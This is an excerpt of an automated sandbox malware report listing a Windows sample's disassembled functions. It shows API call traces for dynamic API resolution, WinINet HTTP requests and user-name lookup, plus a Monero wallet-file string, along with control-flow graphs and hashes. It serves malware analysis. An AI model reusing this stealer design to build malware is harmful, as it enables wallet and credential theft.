                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124915
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 0012493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00124ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00140DDB,00000000,?,?,00000000,?,",00000000,?,00F0F8F0), ref: 00124DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00124E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00124E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00124E49
                          • InternetCloseHandle.WININET(00000000), ref: 00124EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00124EC5
                          • HttpOpenRequestA.WININET(00000000,00F0F8B0,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00124B15
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • InternetCloseHandle.WININET(00000000), ref: 00124ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                          • Instruction ID: c767a06c44d1aca1c2d499cf6dbd1a979ddda38f64ee0ba0d002a7938dd03842
                          • Opcode Fuzzy Hash: 1af3f783657bf220134d198b1a39bc9746d7e8494d92742ca86022d27b9b1689
                          • Instruction Fuzzy Hash: 5412C972950118AADB15EBA0DCA2FEEB778BF64305F904199F14672091EF702F49CF62
                          Function 00137850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                          • Instruction ID: b32a5893357df11d5925120855b5bdad4d0e6cfad7d19e167cb3c7a574d79a64
                          • Opcode Fuzzy Hash: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                          • Instruction Fuzzy Hash: 21F04FB1944609ABCB14DF98DD49BAEFBBCEB09711F10425AFA05A3680C7B415048FA1
                          Function 00121160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                          • Instruction ID: 9c286f9793f08283c77209842a7084fcab405134633cee892b3670e25b5aea26
                          • Opcode Fuzzy Hash: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                          • Instruction Fuzzy Hash: 78D05E7490030CDBCB00DFE0D84A6EDBB7CFB08312F000554DD0572340EB709491CAA6
                          Function 00139C10 Relevance: 222.9, APIs: 112, Strings: 15, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 139c10-139c1a 634 139c20-13a031 GetProcAddress * 43 633->634 635 13a036-13a0ca LoadLibraryA * 8 633->635 634->635 636 13a146-13a14d 635->636 637 13a0cc-13a141 GetProcAddress * 5 635->637 638 13a153-13a211 GetProcAddress * 8 636->638 639 13a216-13a21d 636->639 637->636 638->639 640 13a298-13a29f 639->640 641 13a21f-13a293 GetProcAddress * 5 639->641 642 13a337-13a33e 640->642 643 13a2a5-13a332 GetProcAddress * 6 640->643 641->640 644 13a344-13a41a GetProcAddress * 9 642->644 645 13a41f-13a426 642->645 643->642 644->645 646 13a4a2-13a4a9 645->646 647 13a428-13a49d GetProcAddress * 5 645->647 648 13a4ab-13a4d7 GetProcAddress * 2 646->648 649 13a4dc-13a4e3 646->649 647->646 648->649 650 13a515-13a51c 649->650 651 13a4e5-13a510 GetProcAddress * 2 649->651 652 13a612-13a619 650->652 653 13a522-13a60d GetProcAddress * 10 650->653 651->650 654 13a61b-13a678 GetProcAddress * 4 652->654 655 13a67d-13a684 652->655 653->652 654->655 656 13a686-13a699 GetProcAddress 655->656 657 13a69e-13a6a5 655->657 656->657 658 13a6a7-13a703 GetProcAddress * 4 657->658 659 13a708-13a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00EF5810), ref: 00139C2D
                          • GetProcAddress.KERNEL32(76210000,00EF5850), ref: 00139C45
                          • GetProcAddress.KERNEL32(76210000,00F09B60), ref: 00139C5E
                          • GetProcAddress.KERNEL32(76210000,00F09BC0), ref: 00139C76
                          • GetProcAddress.KERNEL32(76210000,00F09BD8), ref: 00139C8E
                          • GetProcAddress.KERNEL32(76210000,00F0D880), ref: 00139CA7
                          • GetProcAddress.KERNEL32(76210000,00EFAE70), ref: 00139CBF
                          • GetProcAddress.KERNEL32(76210000,00F0D988), ref: 00139CD7
                          • GetProcAddress.KERNEL32(76210000,00F0D820), ref: 00139CF0
                          • GetProcAddress.KERNEL32(76210000,00F0D940), ref: 00139D08
                          • GetProcAddress.KERNEL32(76210000,00F0DA00), ref: 00139D20
                          • GetProcAddress.KERNEL32(76210000,00EF5A90), ref: 00139D39
                          • GetProcAddress.KERNEL32(76210000,00EF5870), ref: 00139D51
                          • GetProcAddress.KERNEL32(76210000,00EF5890), ref: 00139D69
                          • GetProcAddress.KERNEL32(76210000,00EF58B0), ref: 00139D82
                          • GetProcAddress.KERNEL32(76210000,00F0D7F0), ref: 00139D9A
                          • GetProcAddress.KERNEL32(76210000,00F0DA90), ref: 00139DB2
                          • GetProcAddress.KERNEL32(76210000,00EFABA0), ref: 00139DCB
                          • GetProcAddress.KERNEL32(76210000,00EF5A30), ref: 00139DE3
                          • GetProcAddress.KERNEL32(76210000,00F0D928), ref: 00139DFB
                          • GetProcAddress.KERNEL32(76210000,00F0D808), ref: 00139E14
                          • GetProcAddress.KERNEL32(76210000,00F0D7A8), ref: 00139E2C
                          • GetProcAddress.KERNEL32(76210000,00F0D9B8), ref: 00139E44
                          • GetProcAddress.KERNEL32(76210000,00EF58D0), ref: 00139E5D
                          • GetProcAddress.KERNEL32(76210000,00F0D850), ref: 00139E75
                          • GetProcAddress.KERNEL32(76210000,00F0DA78), ref: 00139E8D
                          • GetProcAddress.KERNEL32(76210000,00F0D898), ref: 00139EA6
                          • GetProcAddress.KERNEL32(76210000,00F0D8B0), ref: 00139EBE
                          • GetProcAddress.KERNEL32(76210000,00F0D9A0), ref: 00139ED6
                          • GetProcAddress.KERNEL32(76210000,00F0D9D0), ref: 00139EEF
                          • GetProcAddress.KERNEL32(76210000,00F0D9E8), ref: 00139F07
                          • GetProcAddress.KERNEL32(76210000,00F0D970), ref: 00139F1F
                          • GetProcAddress.KERNEL32(76210000,00F0DA18), ref: 00139F38
                          • GetProcAddress.KERNEL32(76210000,00F00508), ref: 00139F50
                          • GetProcAddress.KERNEL32(76210000,00F0D8C8), ref: 00139F68
                          • GetProcAddress.KERNEL32(76210000,00F0D958), ref: 00139F81
                          • GetProcAddress.KERNEL32(76210000,00EF5910), ref: 00139F99
                          • GetProcAddress.KERNEL32(76210000,00F0DA30), ref: 00139FB1
                          • GetProcAddress.KERNEL32(76210000,00EF59D0), ref: 00139FCA
                          • GetProcAddress.KERNEL32(76210000,00F0DA48), ref: 00139FE2
                          • GetProcAddress.KERNEL32(76210000,00F0DA60), ref: 00139FFA
                          • GetProcAddress.KERNEL32(76210000,00EF5950), ref: 0013A013
                          • GetProcAddress.KERNEL32(76210000,00EF5990), ref: 0013A02B
                          • LoadLibraryA.KERNEL32(00F0D7C0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A03D
                          • LoadLibraryA.KERNEL32(00F0D8F8,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A04E
                          • LoadLibraryA.KERNEL32(00F0D8E0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A060
                          • LoadLibraryA.KERNEL32(00F0D838,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A072
                          • LoadLibraryA.KERNEL32(00F0D868,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A083
                          • LoadLibraryA.KERNEL32(00F0D7D8,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A095
                          • LoadLibraryA.KERNEL32(00F0D910,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A0A7
                          • LoadLibraryA.KERNEL32(00F0DB08,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A0B8
                          • GetProcAddress.KERNEL32(751E0000,00EF59F0), ref: 0013A0DA
                          • GetProcAddress.KERNEL32(751E0000,00F0DB20), ref: 0013A0F2
                          • GetProcAddress.KERNEL32(751E0000,00F09A08), ref: 0013A10A
                          • GetProcAddress.KERNEL32(751E0000,00F0DC40), ref: 0013A123
                          • GetProcAddress.KERNEL32(751E0000,00EF5A10), ref: 0013A13B
                          • GetProcAddress.KERNEL32(73940000,00EFAB28), ref: 0013A160
                          • GetProcAddress.KERNEL32(73940000,00EF5B90), ref: 0013A179
                          • GetProcAddress.KERNEL32(73940000,00EFABF0), ref: 0013A191
                          • GetProcAddress.KERNEL32(73940000,00F0DB38), ref: 0013A1A9
                          • GetProcAddress.KERNEL32(73940000,00F0DB50), ref: 0013A1C2
                          • GetProcAddress.KERNEL32(73940000,00EF5D70), ref: 0013A1DA
                          • GetProcAddress.KERNEL32(73940000,00EF5C30), ref: 0013A1F2
                          • GetProcAddress.KERNEL32(73940000,00F0DB80), ref: 0013A20B
                          • GetProcAddress.KERNEL32(753A0000,00EF5BF0), ref: 0013A22C
                          • GetProcAddress.KERNEL32(753A0000,00EF5D10), ref: 0013A244
                          • GetProcAddress.KERNEL32(753A0000,00F0DB68), ref: 0013A25D
                          • GetProcAddress.KERNEL32(753A0000,00F0DB98), ref: 0013A275
                          • GetProcAddress.KERNEL32(753A0000,00EF5BD0), ref: 0013A28D
                          • GetProcAddress.KERNEL32(76310000,00EFAEE8), ref: 0013A2B3
                          • GetProcAddress.KERNEL32(76310000,00EFAC68), ref: 0013A2CB
                          • GetProcAddress.KERNEL32(76310000,00F0DBB0), ref: 0013A2E3
                          • GetProcAddress.KERNEL32(76310000,00EF5D30), ref: 0013A2FC
                          • GetProcAddress.KERNEL32(76310000,00EF5D90), ref: 0013A314
                          • GetProcAddress.KERNEL32(76310000,00EFAE98), ref: 0013A32C
                          • GetProcAddress.KERNEL32(76910000,00F0DBC8), ref: 0013A352
                          • GetProcAddress.KERNEL32(76910000,00EF5AF0), ref: 0013A36A
                          • GetProcAddress.KERNEL32(76910000,00F09A48), ref: 0013A382
                          • GetProcAddress.KERNEL32(76910000,00F0DBF8), ref: 0013A39B
                          • GetProcAddress.KERNEL32(76910000,00F0DBE0), ref: 0013A3B3
                          • GetProcAddress.KERNEL32(76910000,00EF5D50), ref: 0013A3CB
                          • GetProcAddress.KERNEL32(76910000,00EF5C10), ref: 0013A3E4
                          • GetProcAddress.KERNEL32(76910000,00F0DAA8), ref: 0013A3FC
                          • GetProcAddress.KERNEL32(76910000,00F0DC10), ref: 0013A414
                          • GetProcAddress.KERNEL32(75B30000,00EF5B70), ref: 0013A436
                          • GetProcAddress.KERNEL32(75B30000,00F0DC28), ref: 0013A44E
                          • GetProcAddress.KERNEL32(75B30000,00F0DC58), ref: 0013A466
                          • GetProcAddress.KERNEL32(75B30000,00F0DAC0), ref: 0013A47F
                          • GetProcAddress.KERNEL32(75B30000,00F0DAD8), ref: 0013A497
                          • GetProcAddress.KERNEL32(75670000,00EF5C50), ref: 0013A4B8
                          • GetProcAddress.KERNEL32(75670000,00EF5B30), ref: 0013A4D1
                          • GetProcAddress.KERNEL32(76AC0000,00EF5CB0), ref: 0013A4F2
                          • GetProcAddress.KERNEL32(76AC0000,00F0DAF0), ref: 0013A50A
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5BB0), ref: 0013A530
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5CD0), ref: 0013A548
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5CF0), ref: 0013A560
                          • GetProcAddress.KERNEL32(6F4E0000,00F0D538), ref: 0013A579
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5C70), ref: 0013A591
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5DB0), ref: 0013A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5B50), ref: 0013A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,00EF5DD0), ref: 0013A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0013A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0013A607
                          • GetProcAddress.KERNEL32(75AE0000,00F0D778), ref: 0013A629
                          • GetProcAddress.KERNEL32(75AE0000,00F09958), ref: 0013A641
                          • GetProcAddress.KERNEL32(75AE0000,00F0D658), ref: 0013A659
                          • GetProcAddress.KERNEL32(75AE0000,00F0D550), ref: 0013A672
                          • GetProcAddress.KERNEL32(76300000,00EF5C90), ref: 0013A693
                          • GetProcAddress.KERNEL32(6FF10000,00F0D5B0), ref: 0013A6B4
                          • GetProcAddress.KERNEL32(6FF10000,00EF5B10), ref: 0013A6CD
                          • GetProcAddress.KERNEL32(6FF10000,00F0D5C8), ref: 0013A6E5
                          • GetProcAddress.KERNEL32(6FF10000,00F0D628), ref: 0013A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 0Z$0[$0\$0]$HttpQueryInfoA$InternetSetOptionA$PX$PY$P[$P\$P]$pX$p[$p\$p]
                          • API String ID: 2238633743-2409266022
                          • Opcode ID: 89c9571a49e654c4c9148cbe82949f878ee1c2344cdb80c2e450651272d2548c
                          • Instruction ID: f966cc1715ca65d98ec3c341401500f59527f4ea1f0bbadd286552633468512a
                          • Opcode Fuzzy Hash: 89c9571a49e654c4c9148cbe82949f878ee1c2344cdb80c2e450651272d2548c
                          • Instruction Fuzzy Hash: 73622EB5500A00AFC346DFA9EE989563BFDF78C301F14C51AE605E3264D7B9A841EF62
                          Function 00126280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 126280-12630b call 13a7a0 call 1247b0 call 13a740 InternetOpenA StrCmpCA 1040 126314-126318 1033->1040 1041 12630d 1033->1041 1042 126509-126525 call 13a7a0 call 13a800 * 2 1040->1042 1043 12631e-126342 InternetConnectA 1040->1043 1041->1040 1061 126528-12652d 1042->1061 1044 126348-12634c 1043->1044 1045 1264ff-126503 InternetCloseHandle 1043->1045 1047 12635a 1044->1047 1048 12634e-126358 1044->1048 1045->1042 1050 126364-126392 HttpOpenRequestA 1047->1050 1048->1050 1053 1264f5-1264f9 InternetCloseHandle 1050->1053 1054 126398-12639c 1050->1054 1053->1045 1056 1263c5-126405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 12639e-1263bf InternetSetOptionA 1054->1057 1059 126407-126427 call 13a740 call 13a800 * 2 1056->1059 1060 12642c-12644b call 138940 1056->1060 1057->1056 1059->1061 1066 1264c9-1264e9 call 13a740 call 13a800 * 2 1060->1066 1067 12644d-126454 1060->1067 1066->1061 1071 126456-126480 InternetReadFile 1067->1071 1072 1264c7-1264ef InternetCloseHandle 1067->1072 1076 126482-126489 1071->1076 1077 12648b 1071->1077 1072->1053 1076->1077 1080 12648d-1264c5 call 13a9b0 call 13a8a0 call 13a800 1076->1080 1077->1072 1080->1071
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00126385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001263FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0012646D
                          • InternetCloseHandle.WININET(00000000), ref: 001264EF
                          • InternetCloseHandle.WININET(00000000), ref: 001264F9
                          • InternetCloseHandle.WININET(00000000), ref: 00126503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 28722d2669630939da20bcedb77d8bf832c337a19bb2c2cb350ccffaab6dcdd1
                          • Instruction ID: 47ccd8982b4da7e415ebeebf9ac52c2e3a467d2e2e02317b5b58694984c2cfc7
                          • Opcode Fuzzy Hash: 28722d2669630939da20bcedb77d8bf832c337a19bb2c2cb350ccffaab6dcdd1
                          • Instruction Fuzzy Hash: FB714C71A00218ABDB24EFA0DC59FEE77B8BF44700F508198F10A6B1D0DBB46A85CF52
                          Function 00135510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 135510-135577 call 135ad0 call 13a820 * 3 call 13a740 * 4 1106 13557c-135583 1090->1106 1107 1355d7-13564c call 13a740 * 2 call 121590 call 1352c0 call 13a8a0 call 13a800 call 13aad0 StrCmpCA 1106->1107 1108 135585-1355b6 call 13a820 call 13a7a0 call 121590 call 1351f0 1106->1108 1134 135693-1356a9 call 13aad0 StrCmpCA 1107->1134 1138 13564e-13568e call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1107->1138 1124 1355bb-1355d2 call 13a8a0 call 13a800 1108->1124 1124->1134 1139 1356af-1356b6 1134->1139 1140 1357dc-135844 call 13a8a0 call 13a820 * 2 call 121670 call 13a800 * 4 call 136560 call 121550 1134->1140 1138->1134 1144 1357da-13585f call 13aad0 StrCmpCA 1139->1144 1145 1356bc-1356c3 1139->1145 1270 135ac3-135ac6 1140->1270 1164 135991-1359f9 call 13a8a0 call 13a820 * 2 call 121670 call 13a800 * 4 call 136560 call 121550 1144->1164 1165 135865-13586c 1144->1165 1149 1356c5-135719 call 13a820 call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1145->1149 1150 13571e-135793 call 13a740 * 2 call 121590 call 1352c0 call 13a8a0 call 13a800 call 13aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 135795-1357d5 call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1150->1250 1164->1270 1171 135872-135879 1165->1171 1172 13598f-135a14 call 13aad0 StrCmpCA 1165->1172 1179 1358d3-135948 call 13a740 * 2 call 121590 call 1352c0 call 13a8a0 call 13a800 call 13aad0 StrCmpCA 1171->1179 1180 13587b-1358ce call 13a820 call 13a7a0 call 121590 call 1351f0 call 13a8a0 call 13a800 1171->1180 1201 